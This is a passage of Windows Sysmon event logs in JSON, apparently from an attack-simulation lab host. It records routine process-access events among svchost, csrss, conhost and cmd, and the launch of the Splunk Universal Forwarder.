06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3468,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3469,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3470,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3471,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-001059760500}\r\nTargetProcessId: 4140\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-001059760500}","TargetProcessId":"4140","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3472,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-001059760500}\r\nSourceProcessId: 4140\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010E2750500}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-001059760500}","SourceProcessId":"4140","SourceThreadId":"4232","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010E2750500}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3473,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.666\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-00107D770500}\r\nProcessId: 4204\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-0010E2750500}\r\nParentProcessId: 4180\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.666","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-00107D770500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010E2750500}","ParentProcessId":"4180","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3474,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010E2750500}\r\nSourceProcessId: 4180\r\nSourceThreadId: 4132\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00107D770500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010E2750500}","SourceProcessId":"4180","SourceThreadId":"4132","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00107D770500}","TargetProcessId":"4204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3475,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00107D770500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00107D770500}","TargetProcessId":"4204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3476,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.664\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.664","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
